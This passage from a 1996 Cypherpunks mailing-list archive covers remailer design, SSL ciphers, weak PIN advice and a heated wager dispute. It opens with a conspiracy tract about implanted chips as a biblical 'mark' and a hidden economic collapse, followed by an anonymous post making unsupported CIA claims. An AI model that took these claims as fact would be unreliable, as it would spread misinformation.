smart cards. These cards are being used for telecommunications, medical
information purchases, identification, and more. Western Union now
offers a smartcard that you can purchase to make long distance
telephone calls. The military has been issuing smartcards for some time
now to all of it's personnel. California is issuing smartcards to all
recipients of state benefits, including Social Security and welfare
benefits. The federal government is considering plans to implement a
smartcard for it's 3.1 million members for payroll purposes.

This proliferation of smartcards has not been without it's perceived
benefits. However, this new technology has created another problem,
namely security. The security offered by the smartcard is not
sufficient. Fraud, theft and abuse of smartcard technology has prompted
for many officials to call for a more secure and personal means of
transactions. A single card, useable anywhere in the world is being
considered. But even this presents problems with the issue of security
and privacy.

An improvement on smartcard technology is now being formulated. For
several years, microchips have been tested in animals to learn their
effects, efficiencies and drawbacks. This technology is now perfected
for use in humans. Instead of carrying several different types of
smartcards, credit cards and identification, we are soon to be offered
a single implanted chip that can contain information about us that
anybody ever needs to know.

Not until the last few years, has technology advance to the point where
implantation of a microchip was possible within human flesh. This is a
fulfillment of prophecy, for the Bible says "And he causeth all, both
small and great, rich and poor, free and bond, to receive a mark in
their right hand, or in their forehead" (Rev. 13:16).

Only very recently has technology made it possible to make such a mark
in human flesh. With the widespread usage of computers and databases,
tracking individuals and every financial transaction has now become a
reality.

These tiny chips are already being produced by the millions and
millions today for a variety of electronic devices, including
smartcards. We are on the verge of having these chips implanted in
every human being. Are you prepared to take your mark?


The Coming Collapse

Another deceptive lie being propagated by the government and the media
is our economy. The rate of unemployed workers in this country is being
reported to us at only 3%. However, many private sources of information
have this number much higher, closer to 9-10%. Some goes so far as to
say unemployement is really 20%! Our government cannot afford the bad
publicity of a recession. Statistics prove that nearly every major
corporation has been downsizing staff by the thousands and thousands.
Nearly 1 million positions have been abolished since the first of the
year. Yet in the face of all this, our government continues to tell us
that our economy is booming.

Our federal deficit is also much higher then is being commonly
reported. Deficit spending under President Clinton is at an all time
high.

Simply put, our nation cannot afford to continue on it's present course
of overspending. In a report presented to President Reagan, a
commission of 31 Congressmen stated that the United States would
experience a financial collapse by the year 2012. Some forecasted that
this coming collapse would happen by the year 2005.

Consumer debt in America is the highest consumer debt in the history of
the world, bar none. Many Americans live off of credit cards, always
getting deeper and deeper into debt. The media portrays a fictitious
world where we can "afford" anything. And if we don't want to "buy,
buy, buy", then we are somehow dysfunctional or inadequate.

The average American family has to work two jobs just to make ends
meet. While our purchasing power continues to decline for every dollar
we earn, there's always something new to buy. We are beset by self
centeredness, self grandizement and narcissistic "needs". In a never
ending downward spiral, we chase the holy grail of material wealth,
urged on by the prophets of the press.

Financial ruin, broken families, despair, hopelessness and stress
related disease are often the end results. Thousands turn to alternate
realities, including drugs, alcohol, adulterous relationships and other
means of "release" from these financial pressures.

America has been teetering on the brink of a financial disaster,
unparalleled in human history. Efforts to avoid this collapse include
the establishment of a new monetary system, including the issuing of
new money. Currently, entire caravans of this newly minted money are
being distributed around the country. A national and international
recall of $100 dollar bills was proposed by Senators Patrick Leahy and
John Kerry. This recall may quite possibly trigger the greatest
financial collapse the world has ever seen. This financial collapse
could be triggered overnight when mass panic, fear and distrust in the
new monetary system becomes widespread.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 24 Apr 1996 23:40:20 -0700 (PDT)
To: pdx-cypherpunks-l@teleport.com
Subject: No Subject
Message-ID: <2.2.32.19960425063922.00b3ba08@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here is a reminder on the Cyperpunks meeting in Portland, OR on the 27th of 
April, 1996.

The meeting will be held at Powell's Technical Books at 33 SW Park (Right 
off of Burnside) in Portland, Or at 5:23pm.

We will have people speaking on a couple of topics, a key signing if we can 
get enough interested individuals, and general conversation on cryptography 
and other things on and off topic.

For more information, send me e-mail at alano@teleport.com.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMX8dVOQCP3v30CeZAQHY4gf+PtKUM4HRuAZV0Myy4y22jw5t/PXLaLlk
DXCSjE5qAI/F/zO1JXwiHsjfOd5O8dWkZ8EYbJc8gdMo5/cFs0ItLKGbRyPI8oqv
zdTGNix9cjkhKF+a5wHoaJVVU5trcba0HIkrCgUfkEtLfmEg/8KyLqfCyI8dIPMK
ub9Xgmzkj3yglF75jDycfKEDAxcugQAEgI10ju+VSKDhm+l11ECQsEhN5dv20p0A
JRjP+1DKzCsrEbgky6bzZNKGUltgL5OrFBEQi2Udq+6AOUjgAC9UEvt+CAOVM5Bl
wORavRYp7hy5sP2uI++s6+MYzx55CUSOZfTMHRFE4IKq4zEDijFTUw==
=eLbH
-----END PGP SIGNATURE-----
---
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 24 Apr 1996 23:41:46 -0700 (PDT)
To: Black Unicorn <sjb@universe.digex.net>
Subject: Re: [NOISE- Pratical Application] Reasonable people
Message-ID: <199604250641.XAA17824@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I have stopped to offer first aid after two traffic accidents, one in
Nevada and one in California.  Both states have a "Good Samaritan" law
which protects people who offer first aid from legal liability.  While I
have an extensive background in first aid, none of my credentials are
current.

The practical result is that in neither case did anyone ask me my name.  I
believe that the police enforce the Good Samaritan laws by making no
records which would identify people who might be sued.  This applies to
rank amateurs or Professors of Emergency Medicine.

In the final analysis, I would rather take the chance of being hurt by
someone who didn't know what he was doing than take chance that someone
would be deterred from stopping by threat of liability.  It appears to me
that the law also takes this view.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 24 Apr 1996 15:14:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: The Iron Mountain Report
Message-ID: <199604242213.AAA18326@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Some years ago the federal government set up a special 
[inaudible] group. For two-and-a-half years they met in secret at 
Iron Mountain, New York. Their findings were called "Report from 
Iron Mountain on the Possibility and Desirability of Peace." 
Their document, by some of the leading thinkers, was suppressed. 
Later, it was printed in a limited edition, with the *names* 
removed. Some were shocked by what they read.

Throughout history, permanent peace was dangerous to established 
governments. War, and the threat of war, are the principal 
organizing force for most societies. They divert attention from 
*other* economic and political problems. War keeps the factories 
going, wasting government manpower and material that would 
otherwise be of surplus. Peace brings unemployment, the collapse 
of prices of goods and property, and knocks down the government. 
In simple terms, war prevents [economic] depression. (By the way, 
sooner or later, whatever nation loses a war is overthrown. So it 
has been all the centuries. The American ruling circles lost the 
Vietnam War. The aftermath is bound to scatter the rulers to the 
winds.)

As the report says, in Europe, over the years, the typical 
standing army consisted of troops unfit for employment in 
commerce, industry or agriculture, led by officers unfit to 
practice any legitimate profession or to conduct a business 
enterprise. A large standing army is a form of social welfare 
program; a form of control of the population. War, and the threat 
of war, keep all levels of society busy. The newspapers are kept 
rich reporting it. Pundits are employed to mouth off. Wars speed 
up so-called scientific development. War goods do not have to 
show a profit or be the lowest price. In permanent peace there 
are vast cutbacks in research and development. And yes, wars kill 
off surplus population; young men with no good job waiting for 
them.

The [Iron Mountain] report points out that the war system makes 
stable government of society possible. The end of war means the 
end of national sovereignty.

Without an identified enemy, why would the CIA have 
a large secret budget to assassinate political leaders and 
overthrow other governments the White House does not like?

To promote their secret agenda, the CIA has taken over a part of 
the savings and loan system to funnel men and money for "dirty 
tricks" here and overseas.

The CIA likewise manipulates the federal bankruptcy courts to 
grab up companies for use as covert action fronts. In Chicago, 
this is done with the help of foreign intelligence agencies, such 
as Mossad. Chicago bankruptcy trustee William A. Brand (sp?) jr. 
is a top honcho of the CIA and other spy shops.

In the name of national security, the mass media have been 
*ordered* to "soft pedal" or "stay shut" about spy agencies doing 
such things. The CIA involvement in bankruptcy court should have 
made headlines as the number one item on the evening TV news. Yet 
not one word is said by the liars and whores of the press.

Play it again: Fermilab and weather modification. (312) 731-1505.

New message Monday; we change it several times a week. Donations 
appreciated. Citizens' Committee to Clean Up the Courts, 9800 S. 
Oglesby (sp?), Chicago, 60617.

For the latest on courts, banks, espionage agencies, political 
assassinations and the news media. On 24 hours.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Thu, 25 Apr 1996 00:16:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Netscape Export + 128bits SSL (?)
In-Reply-To: <01BB2F9B.1F300E20@JPKroepsli.S-IP.EUnet.fr>
Message-ID: <317F26AD.4487@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Paul Kroepfli wrote:
> 
> Do you know if it's possible to use Netscape client (export = 40bits
> RC4) on an external SSL layer (i.e., with full encryption, RC4 long
> keys or IDEA)?
> Use extra-US implantation (SSL-Leavy or AppacheSSL, etc.) the IDEA
> option?

Nope.

> It seems that IDEA is no longer supported by SSL 3 (in the cipher
> suite we see IDEA with RSA but not with D-H).

IDEA is in no way deprecated in SSL 3.0.  We were just trying to prune
the list of cipher suites to what we thought was useful.

The cipher suites specified in the SSL 3.0 protocol document are only
a beginning.  All cipher suites beginning with 0xFF are reserved for
experimental use.  As part of the IETF standards process, I'd like
to see an IANA registry set up for registering new cipher suites.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 25 Apr 1996 00:17:50 -0700 (PDT)
To: Alan Bostick <abostick@netcom.com>
Subject: [DETWEILING?] Re: The Iron Mountain Report
In-Reply-To: <5bvfx8m9Loje085yn@netcom.com>
Message-ID: <Pine.GUL.3.93.960425000631.22644H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On second thought, this is so *obviously* a troll that it *must* be
intended to be obvious. Of course there are a lot of really stooooopid
Nazis out there, but this last round is too much. Did you see the one
about Smart Cards being the Mark of the Beast? Follow the URL that message
gave -- it's even loonier than it looks. 

Only nobody@replay.com knows...

Possibilities:

1. Some anti-Nazi (such as Tallpaul -- note this is *not* an accusation!)
   trying to make the Nazis look bad.
2. Some really, really stupid Nazi who doesn't realize that he looks bad
   (if you don't believe sich people exist, look up just about any Usenet 
   post from Les Griswold or A HUBER).
3. Some Detweiler tentacle/clone trolling just for kicks.
4. Declan, trying to troll me.
5. Me, trying to troll Declan, or myself.

<pot-kettle-black=on>

In any case, the person doing it is an asshole, and there is little call
for substantive replies. Don't feed the animals.

</pot-kettle-black>

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 25 Apr 1996 00:17:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Mixmaster to DOS Yet?
Message-ID: <ada4d57d0a021004fafd@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


Yes, it works. I am trying to get my cross compiler to compile the code before
I certify that it is good, and attach my signature. I am recompiling gcc as
I write, hopefully that will solve the problem.

        -Lance

At 8:12 PM 4/20/96, John Erland wrote:
>[Please respond netmail - I do not see this list regularly...thanks!]
>
>Time to ask again:  Has anyone ported Mixmaster to DOS yet?
>
>Thanks for any info.
>
>        JE
>--
>: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
>: Internet: kdf@gigo.com

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 25 Apr 1996 00:24:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <Pine.SUN.3.93.960425030044.3252P-100000@polaris.mindport.net>
Message-ID: <Pine.GUL.3.93.960425001832.22644I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


So are there any arbiters out there who would deal in non-digital cash? Or
someone who would launder US$ to Ecash for a smalle fee? I'd like to
arbitrate a few minor disagreements with my 95% friend Declan. Clearly,
neither private email nor restrained public flames have worked for three
months.

(I don't have TIME for this shit...)

-rich
 http://www.c2.org/~rich/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 25 Apr 1996 01:14:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Golden Key Campaign
Message-ID: <199604250814.BAA07715@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:22 PM 4/24/96 -0700, Wei Dai <weidai@eskimo.com> wrote:
>On Wed, 24 Apr 1996, Hal wrote:
>You can do signatures with Rabin too.  I have a version of it in
>Crypto++ 2.0.  It's been out for a while and RSA hasn't bothered me about
>it.
>Does anyone want to explain why, given the alternatives, people continue
>to use RSA and pay for it?

Sure.  Because 1) it's a good algorithm for the job,
2) we've learned it, and have a PGP base behind our inertia,
3) The legalities of RSA are well-defined,
4) the Stanford patents mostly run out in 1997, unless Roger's suit
        succeeds first,
5) the price of RSA is fairly low, once free RSAREF came out
6) the price of licensing Cylink patents is high and/or unpredictable


#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 25 Apr 1996 04:31:01 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: [PASSWD] good MCI password..."1234"?
Message-ID: <v03006600ada4eb0338ee@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


[from RISKS 18.06]

................................. cut here .................................

Date: 19 Apr 1996 21:07:06 GMT
From: chadm@unhinged.engr.sgi.com (Chad Ray McDaniel)
Subject: MCI recommending bad security practices

Taking advantage of yet another incentive offer, I recently switched my
long distance carrier to MCI. They sent me the standard
yet-another-piece-of-plastic-to-stick-in-my-wallet calling cards. The way
these cards work is that you call an 1-800 number and type in your code
consisting of your phone number followed by your PIN (Personal
Identification Number) which happens to be printed on the card.

Enclosed with the cards was a piece of paper in which MCI wisely suggests
that you change your PIN to something other than what they assigned to you
and printed on the card:

  Customizing your PIN

  Choosing your own four-digit number is the best way to assure you'll
  never forget your PIN. Make it the month and year of a loved one's
  birthday or use the same password you have for your voice mail or
  computer. We'll quickly replace the PIN we assigned you with any four
  digits you choose - just call 1-800-476-7306

For some strange reason MCI is recommending you to do exactly the opposite
of what good security practices would proscribe! Not only do they suggest
that you use an easily-breakable password such as an important date, but
they recommend a practice that would weaken the security of potentially
more sensitive information in a voice-mail or computer system.

Of course, what probably prompted note from MCI was a desire to prevent
MCI's customer service department from being inundated with calls from
people who forgot their PINs. This alludes to the associated risk of
requiring people to remember Yet Another Password (YAP).

-chad






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Loomis <ml3e+@andrew.cmu.edu>
Date: Wed, 24 Apr 1996 23:42:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <glTlu=W00iWUIK4JcS@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


unsubscrive




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 25 Apr 1996 00:02:33 -0700 (PDT)
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <01I3X9N6RA1W8Y50LP@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960425030044.3252P-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, E. ALLEN SMITH wrote:

> From:	IN%"bryce@digicash.com" 24-APR-1996 10:05:20.14
> 
> >1. Acceptable digital signature upon the "bet statement" 
> >from each bettor.  (Note that PGP signatures from PGP key
> >pairs which are not connected to me via the Web of Trust, or
> >which are not verifiable by me via an out-of-band
> >connection, are not acceptable digital signatures.  This is
> >because of the MITM attack problem, not because  I need True
> >Names to be connected to the signatures.)
> 
> 	IIRC, currently Black Unicorn doesn't have any signatures on
> his public key of others. Therefore, this requirement, while understandable,
> could cause a bit of a difficulty in the current situation.

Please obtain a copy of my current key by finger.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Wed, 24 Apr 1996 21:16:18 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: [NOISE] [Wager: Seeming Resolution]
In-Reply-To: <m0uC7oO-00092NC@pacifier.com>
Message-ID: <Pine.3.89.9604250415.A19922-0100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain



	Jim:

On Wed, 24 Apr 1996, jim bell wrote:

> Notice that he hasn't presented what he would claim to be the scope of the 
> conditions, which suggests that he's going to try to spring them on me 

	I haven't seen a list of your conditions yet.

	How about placing your minimally acceptable requirements 
	for accepting Black Unicorn's Wager.  


> the examples quoted in that SC decision, which were cited as exceptions to 
> 5th amendment protections in the US, all of them represent examples which 
> were only considered technologically useful in the last 100 years, the 
> oldest being fingerprinting.  Given this, it is easy to conclude that there 

	Which makes it interesting that he provides an Ecclesiastical 
	Court Decision from the Seventeenth Century.  

	It isn't the US, but you haven't made an limitations 
	as to which legal system is acceptable.  

> Isn't it interesting how Unicorn always seems to dodge the analysis and 
> replace it with precedent?

	Almost as interesting as your not admitting your errors 
	when they are pointed out to you.

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Thu, 25 Apr 1996 03:31:06 -0700 (PDT)
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: The Iron Mountain Report
In-Reply-To: <199604242213.AAA18326@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9604250640.A7838-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


[The Iron Mountain report] was along ago admitted to be a parody by its 
real authors.

-----------------------------------------------------------------------
Jay Holovacs <holovacs@ios.com>
-----------------------------------------------------------------------
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Wed, 24 Apr 1996 23:46:30 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: [NOISE] [Wager: Seeming Resolution]
In-Reply-To: <m0uCJ4L-000916C@pacifier.com>
Message-ID: <Pine.3.89.9604250600.A21477-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain


	Jim:

On Wed, 24 Apr 1996, jim bell wrote:

> >	for accepting Black Unicorn's Wager.  
> At the very least, he'd have to IDENTIFY himself at least to the extent that 
> I have done so.  Name, address, telephone number, etc.  

	One way to weasel out of it.  

> >> the examples quoted in that SC decision, which were cited as exceptions to 
> >> 5th amendment protections in the US, all of them represent examples which 
> >> were only considered technologically useful in the last 100 years, the 
> >> oldest being fingerprinting.  Given this, it is easy to conclude that there 
> >
> >	Which makes it interesting that he provides an Ecclesiastical 
> >	Court Decision from the Seventeenth Century.  
> >
> >	It isn't the US, but you haven't made an limitations 
> >	as to which legal system is acceptable.
> 
> As you quoted me above, you are aware that my point was that the SC-listed 
> exceptions to the 5th amendment were recent and didn't have older US 
> precedent.  I claimed that there was no logical reason to believe that such 

	So your conditions are US Supreme Court rulings, that
	handwriting exemplars are not fifth amendment violations.

	Those only occured in the middle of the Twentieth Century.   
	I don't think anybody is going to come up with an earlier 
	citation than that.  

	However, there are citations in US Court Cases, from C18 &
	C19, which made such a ruling.  It was only in C20 that 
	somebody fought it to the Supreme Court, and the court 
	decided to hear it.  

> claimed exceptions were anything other than comparatively recent excuses 

	200 years is recent, in comparison to China's 7 000 years
	of civilization, or the 2 000 years of Roman Law.  << Mental
	note --- see whether the Roman Courts could demand handwriting 
	exemplars, or not --- they did use Questioned Document 
	Examiners.  >> 

> given to allow violations of the 5th amendment.   While I am not totally 
> disinterested in foreign examples, that was NOT the area under discussion. A 

	I guess British Cases pre-1700 don't count.  Pity.  

        xan

        jonathon
        grafolog@netcom.com






**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 25 Apr 1996 07:14:43 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Meta: The Arguing about the Terms of the Wager Continues
In-Reply-To: <m0uCIti-00094cC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960425070028.7156A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 24 Apr 1996, jim bell wrote:

> ...  Let Unicorn FIRST identify himself.  Then 
> we'll see who's "weaseling."


What has identity got to do with it?  If Jim is so worried about
it (as opposed to just trying to cover up his own weaseling),
then I will cover Black Unicorn's wager.  I have a persistant
identity on this list.  Hell, Eric Hughes has keys to my house.


I stand ready to hand Eric a postal money order made out to
"Jim Bell or Sandy Sandfort" and let him or Tim May or any of a
dozen other Cypherpunks decide this issue once and for all.
Is Bell willing to do the same?
  
Jim, take the damned bet or shut the fuck up.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 25 Apr 1996 07:28:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:  NYT on MS Java, Net Radio
Message-ID: <199604251426.HAA05778@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: John Young <jya@pipeline.com>
> "Edge for Sun as Microsoft Embraces Java."
> 
> By John Markoff
> 
>      http://www.nytimes.com/library/cyber/week/0425license.html

>From the article:

> SAN FRANCISCO -- Sun Microsystems Inc., already a stock-market favorite
> on the strength of its Internet products, has secured a significant
> endorsement from Microsoft Corp., which plans to announce next week
> that it will incorporate Sun's Java software programming language into
> the Microsoft Windows 95 personal computer operating system.

> The companies would not comment, but industry executives said
> Microsoft, whose Windows operating system is used on some 80 percent of
> the world's PCs, will join IBM and Novell, among other companies, in
> announcing plans to embed Java into their software operating systems.

> Those moves, and the possibility of a similar endorsement by Apple
> Computer Inc., should go a long way toward making Java an industry
> software standard in the rapidly expanding Internet market.

In other Java news, the report from the Princeton scientists who have
found many security weaknesses in Java is now available at <URL:
http://www.cs.princeton.edu/sip/pub/secure96.html >.  It is very critical
of the language design and implementation.  I don't fully agree with the
thrust of their criticisms, because I don't think provability is a
practical matter with programs complex enough to be useful.  But they
have certainly identified an alarming number of problems.  I will post
later today a list of the issues they have identified.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 25 Apr 1996 04:36:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NYT on MS Java, Net Radio
Message-ID: <199604251136.HAA06962@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


April 25, 1996
     
"Edge for Sun as Microsoft Embraces Java."

By John Markoff

     http://www.nytimes.com/library/cyber/week/0425license.html

----------

"FCC Backs Cheap Link to Internet by Radio."

By Edmund L. Andrews

     http://www.nytimes.com/library/cyber/week/0425radio.html
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 25 Apr 1996 09:41:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: An idea for refining penet-style anonymous servers
Message-ID: <Uc5fx8m9LojB085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Does the world need to have the anon.penet.fi model of anonymous email
and news posting refined, given the existence of Cypherpunks remailers
and Mixmaster digital mixes, not to mention nymservers?

I will listen respectfully to the arguments of the people who say "no",
and they're very likely right.  But penet *is* the most widely used
means of anonymous communication on the Internet - largely because of
its ease of use compared to genuinely secure remailers and mixes.

The other night, while sick and feverish with the flu, a scheme popped
into my head that would seem to make penet-style anonymous servers less
vulnerable to compromise through seizure of the remailer equipment or of
the address database.  In the cold light of day and normal temperature,
it still seems like a sound idea to me, and I wondered what other people
would think of it.

My scheme is the design of the address database.  It consists of two
hash tables, one for sending messages (which maps anonymous IDs onto
sender's addresses), and one for receiving them (mapping recipient's
addresses onto anonymous IDs).  A cryptographically secure hash (say,
MD5) is used for the index of both tables.

The index of the sending message table is the MD5 hash of the sender's
address.  The table entry the index points to is the sender's anonymous
ID, encrypted by a symmetric algorithm (maybe IDEA).  The encryption key
would be a different hash, by another algorithm (let's suppose it's
SHA), of that same address.

In forwarding a message, the server MD5-hashes the sender's address and
looks at the table.  If it doesn't find a corresponding entry, it
creates one.  If it *does* find an entry, it SHA-hashes the sender's
address and uses this key to decrypt the anonymous ID.  In the unlikely
event of collision the decrypted ID will be gibberish and the server
does something sensible (like appending padding to the address and
trying again).  The header information is filtered and the anonymous ID
inserted in the From: line. 

The receiving message hash table is designed similarly, in reverse.  The
index of the hash table is the MD5 hash of the anonymous ID; the entry
in the table is the recipient's email address, encrypted with the SHA
hash of the anonymous ID.  When a message comes in, the anon ID is
hashed and looked up in the table.  If  nothing is found, the message is
bounced. If an entry is found, the anon ID is SHA hashed and the table
entry decrypted.  If it is gibberish, a collision has taken place and
handled appropriately.  The message is then forwarded to its intended
recipient. 

What all this accomplishes is to obscure more information from attackers
and from honest operators.  In the event of abuse it is a simple matter
to find out who the abusers are and block them out.  If the operator is
subject to subpoena, anyone named in the subpoena can be easily
identified . . . *but nobody else can!*  Authorities cannot use a search
for one identity as an excuse for a fishing expedition in the address
database. 

(Obscuring information from honest operators can protect the operator
when questions of liability or even conspiracy come up.)

There is a way that attackers who have seized or copied the database can
search it - by trying it out on anonymous IDs, or user addresses, until
they hit paydirt.  And of course such an anonymous server can be no more
trustworthy than its operator; and the fundamental security limitations of
the penet-style anonymous server are well-understood.

So what do people think of this scheme of mine?  Are there drawbacks or
weaknesses that I'm not seeing?  Is it a good idea?  I'd really like it
if *something* good came out of being laid up with the flu. 

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMX+n0OVevBgtmhnpAQFkrwL+N+CklsLNsqHXNPnCOs1mogNydNnCtvGs
cUqK9rG3xpTYFsPMH6lhWq8wfPfKtQ88xs3RC/JE8ypcDZBugifNDf7hTuGeLZ8n
Q8RDvnAq0qNz9rxqHiMuyOQ3kf6YEVys
=g5SU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 25 Apr 1996 09:00:00 -0700 (PDT)
To: Rich Graves <cypherpunks@toad.com
Subject: Re: arbiter/escrow agent for hire
Message-ID: <v02120d00ada551bbae9b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:23 4/25/96, Rich Graves wrote [paraphrased]
>So are there any arbiters out there who would deal in non-digital cash? Or
>someone who would convert US$ to Ecash for a smalle fee?

I will be happy to do USD to Ecash conversions for a nominal fee.


Disclaimer: My opinions are my own, not those of my employer.

